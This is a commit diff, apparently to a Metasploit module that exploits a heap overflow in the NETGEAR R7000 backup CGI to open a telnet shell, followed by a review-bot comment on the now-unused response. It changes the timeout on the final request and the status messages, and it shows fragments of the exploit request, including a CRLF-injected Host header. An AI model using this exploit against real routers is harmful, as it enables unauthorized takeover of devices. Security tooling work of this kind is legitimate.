Add in timeout to 10th and final request to prevent module from throwing errors like it isn't working when it really is
parent
a13f6a35dc
commit
a518fcac98
|
@ -51,9 +51,8 @@ msf6 auxiliary(admin/http/netgear_r7000_backup_cgi_heap_overflow_rce) > run
|
||||||
[*] Executing automatic check (disable AutoCheck to override)
|
[*] Executing automatic check (disable AutoCheck to override)
|
||||||
[*] Router is a NETGEAR router (R7000)
|
[*] Router is a NETGEAR router (R7000)
|
||||||
[+] The target is vulnerable.
|
[+] The target is vulnerable.
|
||||||
[*] Sending 10th and final packet. The exploit should hang at this point.
|
[*] Sending 10th and final packet...
|
||||||
[*] Connect to the telnet shell by running: telnet 192.168.1.1
|
[*] If the exploit succeeds, you should be able to connect to the telnet shell by running: telnet 192.168.1.1
|
||||||
[+] Exploit complete, connect to your shell!
|
|
||||||
[*] Auxiliary module execution completed
|
[*] Auxiliary module execution completed
|
||||||
msf6 auxiliary(admin/http/netgear_r7000_backup_cgi_heap_overflow_rce) >
|
msf6 auxiliary(admin/http/netgear_r7000_backup_cgi_heap_overflow_rce) >
|
||||||
```
|
```
|
||||||
|
|
|
@ -311,8 +311,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
send_data = post_data.to_s
|
send_data = post_data.to_s
|
||||||
send_data.sub!(/\r\n--#{post_data.bound}--\r\n/, '')
|
send_data.sub!(/\r\n--#{post_data.bound}--\r\n/, '')
|
||||||
|
|
||||||
print_status('Sending 10th and final packet. The exploit should hang at this point.')
|
print_status('Sending 10th and final packet...')
|
||||||
print_status("Connect to the telnet shell by running: telnet #{datastore['RHOST']}")
|
|
||||||
|
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'method' => 'POST',
|
'method' => 'POST',
|
||||||
|
@ -321,13 +320,9 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
'agent' => nil, # Disable sending the User-Agent header
|
'agent' => nil, # Disable sending the User-Agent header
|
||||||
'headers' => { 'Host' => "#{datastore['RHOST']}:#{datastore['RPORT']}\r\n#{Rex::Text.rand_text_alpha(512)}: #{Rex::Text.rand_text_alpha(9)}" },
|
'headers' => { 'Host' => "#{datastore['RHOST']}:#{datastore['RPORT']}\r\n#{Rex::Text.rand_text_alpha(512)}: #{Rex::Text.rand_text_alpha(9)}" },
|
||||||
'data' => send_data
|
'data' => send_data
|
||||||
})
|
}, 0)
|
||||||
|
|
||||||
if !res.nil?
|
print_status("If the exploit succeeds, you should be able to connect to the telnet shell by running: telnet #{datastore['RHOST']}")
|
||||||
fail_with(Failure::UnexpectedReply, 'The target R7000 router responded on the tenth packet!')
|
|
||||||
end
|
|
||||||
|
|
||||||
print_good('Exploit complete, connect to your shell!')
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def run
|
def run
|
||||||
|
|
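Review bot: The result of the final `send_request_cgi` call is still assigned to `res` (the call opens in the hunk at line 311 and closes with `}, 0)` in the hunk at line 321), but nothing reads it now that the `if !res.nil?` check is gone. With a timeout of `0` the HTTP client presumably does not wait for a reply at all, so `res` would always be nil; that should be confirmed against the client's timeout handling. If it holds, drop the `res =` and state the intent above the call, for example `# Timeout 0: do not wait for a reply, the target is not expected to answer this request`. The module also loses the one signal the old code used to report a failed run (a response to the tenth request), so the same status line is printed on every run and the module documentation should say the outcome has to be verified separately. The enclosing method starts above the visible hunks.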